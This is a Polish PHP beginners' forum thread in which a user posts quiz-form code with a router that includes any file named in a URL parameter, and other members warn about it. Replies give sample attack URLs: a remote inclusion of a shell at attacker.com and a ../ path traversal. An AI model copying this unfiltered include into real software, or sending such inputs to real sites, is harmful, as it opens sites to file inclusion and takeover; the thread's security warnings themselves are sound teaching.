Forum PHP.pl

Forum PHP.pl > Forum > Przedszkole

[PHP]POST, GET obojętnie co nie przesyła danych dalej.

luke18dg Zobacz profil	16.02.2013, 14:17:19 Post #1
Grupa: Zarejestrowani Postów: 79 Pomógł: 0 Dołączył: 26.03.2011 Skąd: Dąbrowa Górnicza Ostrzeżenie: (0%)	Witam, mój problem jest krótki ale kody już nie. Nie mam pomysłu dlaczego moje dane wpisane formularz nie są wysyłane dalej. Tablica, którą zapisuje w sesji działa tak piknię, ale już nie dane, które wpisuje w formularz. Żeby ładnie utrzymać ten sam adres czyli indexhome.php używam takiego kodu: indexhome.php [PHP] pobierz, plaintext <?php if(!isset($_GET['url'])) {include('home.php');} else { if (is_file($_GET['url'].'.php')) {include($_GET['url'].'.php');} else {echo'Error 500002 - Brak strony o podanej nazwie.';} } ?> [PHP] pobierz, plaintext Dlatego konsekwencją jest to, że w akcji formularza mam: [PHP] pobierz, plaintext <form action="indexhome.php" method="GET"> [PHP] pobierz, plaintext A musi być w GET ponieważ poprzez ukryte pole w formularzu wracam na stronę docelową, którą chce uzyskać. [PHP] pobierz, plaintext <input type="hidden" name="url" value="dodawaniequizu"> [PHP] pobierz, plaintext A wpisując coś w formularz i naciskając przycisk, na stronie "walidacjadodawaniaquizu" nic się nie pojawia? Czemu? Jeśli te kawałki były nieprzyjazne dla was zamieszczam te 3 strony, które sprawiają mi sen z powiek. indexhome.php [PHP] pobierz, plaintext <?php if(!isset($_GET['url'])) {include('home.php');} else { if (is_file($_GET['url'].'.php')) {include($_GET['url'].'.php');} else {echo'Error 500002 - Brak strony o podanej nazwie.';} } ?> [PHP] pobierz, plaintext dodawaniequizu.php [PHP] pobierz, plaintext <?php session_start(); /* W - pole wielokrotnego wyboru J - pole jednokrotnego wyboru T - pole tekstowe */ if(!(empty($_GET['wysylanie']))) { if(($_GET['wysylanie'])=='Wyslij') { header('Refresh:0; URL=indexhome.php?url=walidacjadodawaniaquizu'); exit(); } } if(!(empty($_SESSION['dane']))){$tablica=$_SESSION['dane'];} if(!(empty($tablica))) { $keys=array_keys($tablica); $ostatni=$keys[count($keys)-1]; $ostatni+=1; } else {$ostatni=1;} if(!(empty($_GET['dodac']))) { switch($_GET['dodac']) { case 'pole_wielokrotnego': { $tablica[$ostatni]['name']='pytanie'.$ostatni; $tablica[$ostatni]['value']=''; $tablica[$ostatni]['typpola']='W'; $tablica[$ostatni]['poprawna']=''; $tablica[$ostatni]['liczbaodp']=0; break; } case 'pole_jednokrotnego': { $tablica[$ostatni]['name']='pytanie'.$ostatni; $tablica[$ostatni]['value']=''; $tablica[$ostatni]['typpola']='J'; $tablica[$ostatni]['poprawna']=''; $tablica[$ostatni]['liczbaodp']=0; break; } case 'pole_tekstowe': { $tablica[$ostatni]['name']='pytanie'.$ostatni; $tablica[$ostatni]['typpola']='T'; $tablica[$ostatni]['value']=''; break; } } $odpowiedznr=explode(':',$_GET['dodac']); $keys = array_keys($odpowiedznr); $ostatniodp = $keys[count($keys)-1]; if($ostatniodp>0) {$tablica[$odpowiedznr[1]]['liczbaodp']+=1;} unset($_GET['dodac']); } echo '<html><head><title>Tworus Lukasz</title><meta name="author" content="Tworus Łukasz"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> </head><body><form action="indexhome.php" method="GET"><table border="1">'; if(!(empty($tablica))) { for($i=1; $i<$ostatni; $i++) { switch($tablica[$i]['typpola']) { case 'T': { echo '<tr><td>'.$i.' <input type="text" name="'.$tablica[$i]['name'].'"'; if(!(empty($tablica[$i]['value']))) {echo 'value="'.$tablica[$i]['value'].'"';} echo '></td></tr>'; break; } case 'J': { echo '<tr><td>'.$i.' <input type="text" name="'.$tablica[$i]['name'].'"'; if(!(empty($tablica[$i]['value']))) {echo 'value="'.$tablica[$i]['value'].'"';} echo '></td></tr>'; if($tablica[$i]['liczbaodp']==0) {$tablica[$i]['liczbaodp']=1;} for($j=0; $j<$tablica[$i]['liczbaodp']+1; $j++) { echo '<tr><td> <input type="radio" name="odpowiedz:'.$i.'" value="'.$j.'"> <input type="text" name="odpowiedztekst:'.$i.':'.$j.'"'; if(!(empty($tablica[$i][$j]))){echo 'value="'.$tablica[$i][$j].'"';} echo'></td></tr>'; } echo '<tr><td><input type="submit" value="dodajodp:'.$i.'" name="dodac"></td></tr>'; break; } case 'W': { echo '<tr><td>'.$i.' <input type="text" name="'.$tablica[$i]['name'].'"'; if(!(empty($tablica[$i]['value']))) {echo 'value="'.$tablica[$i]['value'].'"';} echo '></td></tr>'; if($tablica[$i]['liczbaodp']==0) {$tablica[$i]['liczbaodp']=1;} for($j=0; $j<$tablica[$i]['liczbaodp']+1; $j++) { echo '<tr><td> <input type="checkbox" name="odpowiedz:'.$i.'" value="'.$j.'"> <input type="text" name="odpowiedztekst:'.$i.':'.$j.'"'; if(!(empty($tablica[$i][$j]))){echo 'value="'.$tablica[$i][$j].'"';} echo'></td></tr>'; } echo '<tr><td><input type="submit" value="dodajodp:'.$i.'" name="dodac"></td></tr>'; break; } } } print_r($tablica); $_SESSION['dane']=$tablica; } echo'<tr><td><input type="submit" value="pole_wielokrotnego" name="dodac"><input type="submit" value="pole_jednokrotnego" name="dodac"> <input type="submit" value="pole_tekstowe" name="dodac"> <br></td><tr><td><input type="hidden" name="url" value="dodawaniequizu"> <input type="submit" value="Wyslij" name="wysylanie"></td></tr></table></form></body></html>'; ?> [PHP] pobierz, plaintext walidacjadodawaniequizu.php [PHP] pobierz, plaintext <?php session_start(); if(!(empty($_GET['nazwa']))) { if(($_GET['nazwa'])=='kasujsesje') { unset($_SESSION['dane']); header('Location: indexhome.php?url=dodawaniequizu'); exit(); } if(($_GET['nazwa'])=='pozostawsesje') { header('Location: indexhome.php?url=dodawaniequizu'); exit(); } } echo 'SESJA <br>'; print_r($_SESSION['dane']); echo '<BR><BR><BR><BR>'; echo 'POST<BR>'; print_r($_POST); echo '<BR><BR><BR><BR>'; echo 'GET<BR>'; print_r($_GET); echo ' <form action="indexhome.php"> <input type="submit" value="kasujsesje" name="nazwa"> <input type="submit" value="pozostawsesje" name="nazwa"> <input type="hidden" name="url" value="walidacjadodawaniaquizu"> </form>'; ?> [PHP] pobierz, plaintext

Start new topic

Odpowiedzi (1 - 10)

!*! Zobacz profil	17.02.2013, 12:08:10 Post #2
Grupa: Zarejestrowani Postów: 4 298 Pomógł: 447 Dołączył: 16.11.2006 Ostrzeżenie: (0%)	1. Twój kod jest dziurawy 2. Twój kod jest źle napisany 3. z debuguj swój kod var_dump linijka po linijce i będziesz wiedział w którym miejscu i dlaczego gubisz dane.

luke18dg Zobacz profil	17.02.2013, 15:28:08 Post #3
Grupa: Zarejestrowani Postów: 79 Pomógł: 0 Dołączył: 26.03.2011 Skąd: Dąbrowa Górnicza Ostrzeżenie: (0%)	Czy można prosić o wskazanie dlaczego jest źle napisany/gdzie gubię dane, gdyż każda uwaga, która może pomóc udoskonalić/poprawić moje działania jest bardzo ważna dla mnie.

pyro Zobacz profil	17.02.2013, 15:43:03 Post #4
Grupa: Zarejestrowani Postów: 2 148 Pomógł: 230 Dołączył: 26.03.2008 Ostrzeżenie: (0%)	Cytat(luke18dg @ 17.02.2013, 15:28:08 ) Czy można prosić o wskazanie dlaczego jest źle napisany/gdzie gubię dane, gdyż każda uwaga, która może pomóc udoskonalić/poprawić moje działania jest bardzo ważna dla mnie. Cytat(!! @ 17.02.2013, 12:08:10 ) 1. Twój kod jest dziurawy Wyobraź sobie, że ktoś wpisze http://twojastrona.pl?url=http://attacker.com/php_shell Cytat(!! @ 17.02.2013, 12:08:10 ) 2. Twój kod jest źle napisany Mieszanie widoku z logiką aplikacji, totalna nieczytelnośc no i przyszedłes tu, bo w końcu nie działa (IMG:style_emoticons/default/smile.gif) Cytat(luke18dg @ 17.02.2013, 15:28:08 ) gdzie gubię dane Cytat(!*! @ 17.02.2013, 12:08:10 ) 3. z debuguj swój kod var_dump linijka po linijce i będziesz wiedział w którym miejscu i dlaczego gubisz dane.

luke18dg Zobacz profil	17.02.2013, 17:08:31 Post #5
Grupa: Zarejestrowani Postów: 79 Pomógł: 0 Dołączył: 26.03.2011 Skąd: Dąbrowa Górnicza Ostrzeżenie: (0%)	Cytat(pyro @ 17.02.2013, 15:43:03 ) Wyobraź sobie, że ktoś wpisze http://twojastrona.pl?url=http://attacker.com/php_shell Dlatego mam taki kod. [PHP] pobierz, plaintext <?php if(!isset($_GET['url'])) {include('home.php');} else { if (is_file($_GET['url'].'.php')) {include($_GET['url'].'.php');} else {echo'Error 500002 - Brak strony o podanej nazwie.';} } ?> [PHP] pobierz, plaintext Prawdopodobnie wypiszę brak strony lub zgłupieje z powodu podwójnych rozszerzeń lub będzie próbowało szukać strony w katalogu o nazwie "http://attacker.com/php_shell.php" Cytat(pyro @ 17.02.2013, 15:43:03 ) Mieszanie widoku z logiką aplikacji, totalna nieczytelnośc no i przyszedłes tu, bo w końcu nie działa (IMG:style_emoticons/default/smile.gif) Prawda przyszedłem ponieważ nie działa. Ale zbytnio nie rozumiem: Cytat Mieszanie widoku z logiką aplikacji, totalna nieczytelnośc O co tutaj chodzi bo zbytnio nie zrozumiałem? Prawdopodobnie chodzi o wcięcia i to przyznam fakt nie wiedziałem, czy łączyć jak php czy zachować wcięcia dla html. A zapisu If(warunek){ instrukcje } nie uważam za czytelny ponieważ pierwsza klamra, jest nie widoczna podczas scrolowania kodu (IMG:style_emoticons/default/smile.gif) Dziękuje za odzew i czekam na odpowiedz : )

foxbond Zobacz profil	17.02.2013, 17:38:03 Post #6
Grupa: Zarejestrowani Postów: 162 Pomógł: 12 Dołączył: 20.12.2009 Skąd: Siedlce Ostrzeżenie: (0%)	Cytat Prawdopodobnie wypiszę brak strony lub zgłupieje z powodu podwójnych rozszerzeń lub będzie próbowało szukać strony w katalogu o nazwie "http://attacker.com/php_shell.php" Jeżeli bodajże allow_url_include=1 (czyjakoś tak w php.ini) wykonasz skrypt "http://attacker.com/php_shell.php" Cytat Prawda przyszedłem ponieważ nie działa. Ale zbytnio nie rozumiem: Cytat Mieszanie widoku z logiką aplikacji, totalna nieczytelnośc O co tutaj chodzi bo zbytnio nie zrozumiałem? Prawdopodobnie chodzi o wcięcia i to przyznam fakt nie wiedziałem, czy łączyć jak php czy zachować wcięcia dla html. A zapisu If(warunek){ instrukcje } nie uważam za czytelny ponieważ pierwsza klamra, jest nie widoczna podczas scrolowania kodu Dziękuje za odzew i czekam na odpowiedz : ) Chodzi o to, aby oddzielna klasa/funkcja/blok kodu odpowiadał za wyświetlenie strony dla użytkownika, a oddzielny za obliczenia/komunikację z bazą itp.

!*! Zobacz profil	17.02.2013, 18:19:57 Post #7
Grupa: Zarejestrowani Postów: 4 298 Pomógł: 447 Dołączył: 16.11.2006 Ostrzeżenie: (0%)	Cytat(luke18dg @ 17.02.2013, 17:08:31 ) Dlatego mam taki kod. [PHP] pobierz, plaintext <?php if(!isset($_GET['url'])) {include('home.php');} else { if (is_file($_GET['url'].'.php')) {include($_GET['url'].'.php');} else {echo'Error 500002 - Brak strony o podanej nazwie.';} } ?> [PHP] pobierz, plaintext Kod http://example/index.php?url=../../../admin/rozpocznij_zaglade.php Teraz już rozumiesz? Nie wczytuje się plików bezpośrednio z url, zakładając że to jego nazwa, poza tym nie filtrujesz tego w ogóle... a poza tym nie warto pisać poraz 100 tego samego, przejrzyj forum, jest dużo na ten temat. Ten post edytował *!!** 17.02.2013, 18:20:58

luke18dg Zobacz profil	18.02.2013, 01:29:10 Post #8
Grupa: Zarejestrowani Postów: 79 Pomógł: 0 Dołączył: 26.03.2011 Skąd: Dąbrowa Górnicza Ostrzeżenie: (0%)	Rozumiem, zagrożenie związane z URL tylko nie rozumiem, twoich obaw związanych z filtrowaniem? Tak jak kolega wypowiedział się wyżej jeśli mam wyłączoną tą funkcję "allow_url_include=1 " to powinienem być bezpieczny. Rozumiem filtrowanie gdy użytkownik podaje bezpośrednio dane, które będą zapisywane w bazie. Tutaj wydaje mi się, że funkcje pełni is_file, który mi ma sprawdzać czy taki plik istnieje z końcówką php. Wynikiem wywołania adresu URL prawdopodobnie okaże się false. Ponieważ nie znajdzie w aktualnym katalogu takiego pliku. A zbytnio nie rozumiem jak by to haker miał się "wcisnąć" przez ftp, które jest o wiele lepiej zabezpieczone (IMG:style_emoticons/default/smile.gif) Ten post edytował luke18dg 18.02.2013, 03:26:51

com Zobacz profil	18.02.2013, 02:01:09 Post #9
Grupa: Zarejestrowani Postów: 3 034 Pomógł: 366 Dołączył: 24.05.2012 Ostrzeżenie: (0%)	url powinieneś filtrować zawsze bo wystarczy, że wpisze Kod http://127.0.0.1/indexhome.php?url=indexhome i już Ci się zapętli wywołanie w nieskończoność (IMG:style_emoticons/default/wink.gif) pozatym jak sam wspomniałeś może sie pojawić problem podwójnego roszerzenia, kiedy ktoś wpisze adres w url nawet poprawny adres ale z roszerzeniem i wtedy też mu sie pojawi komunikat Error 500002 - Brak strony o podanej nazwie. (IMG:style_emoticons/default/wink.gif) btw o wiele prosciej byłoby uzyć mod_rewrite i wyrazeń reguralnych (IMG:style_emoticons/default/wink.gif) A co do czytelności kodu to polecam lekture na temat MVC(czyli oddzielienie widoku od danych pobieranych i kontroli nad nimi) , bo obecnie bez tego ani rusz (IMG:style_emoticons/default/wink.gif) Ten post edytował com 18.02.2013, 02:09:39

luke18dg Zobacz profil	18.02.2013, 03:26:36 Post #10
Grupa: Zarejestrowani Postów: 79 Pomógł: 0 Dołączył: 26.03.2011 Skąd: Dąbrowa Górnicza Ostrzeżenie: (0%)	I takiej konkretnej odpowiedzi oczekiwałem, dziękuje. : )

!*! Zobacz profil	18.02.2013, 10:39:29 Post #11
Grupa: Zarejestrowani Postów: 4 298 Pomógł: 447 Dołączył: 16.11.2006 Ostrzeżenie: (0%)	Cytat(luke18dg @ 18.02.2013, 01:29:10 ) Rozumiem, zagrożenie związane z URL tylko nie rozumiem, twoich obaw związanych z filtrowaniem? Tak jak kolega wypowiedział się wyżej jeśli mam wyłączoną tą funkcję "allow_url_include=1 " to powinienem być bezpieczny. Rozumiem filtrowanie gdy użytkownik podaje bezpośrednio dane, które będą zapisywane w bazie. Tutaj wydaje mi się, że funkcje pełni is_file, który mi ma sprawdzać czy taki plik istnieje z końcówką php. Wynikiem wywołania adresu URL prawdopodobnie okaże się false. Ponieważ nie znajdzie w aktualnym katalogu takiego pliku. A zbytnio nie rozumiem jak by to haker miał się "wcisnąć" przez ftp, które jest o wiele lepiej zabezpieczone (IMG:style_emoticons/default/smile.gif) Skąd myśl że is_file Cie przed czymś broni? Przeczytałeś od czego ona jest? Tak samo allow_url_include? Wątpię. Skoro inne pliki masz z rozszerzeniem .php to oczywiste że mogę wczytać każdy jaki mi się tylko podoba. Nie ma sensu prowadzić dalej tej dyskusji. Tematów było o tym więcej na forum niż użytkowników. Ten post edytował *!!** 18.02.2013, 10:40:26

« Następny starszy · Przedszkole · Następny nowszy »

Reply to this topic

Start new topic

2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)

0 Zarejestrowanych:

Tryb wyświetlania: Przełącz na: Standardowy · Linearny+ · Przełącz na: Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

Aktualny czas: 2.10.2025 - 00:39

Powered By IP.Board © 2025 IPS, Inc.
All changes by PHP.pl Administrators

Hosting zapewnia

NQ.pl hosting, trac, svn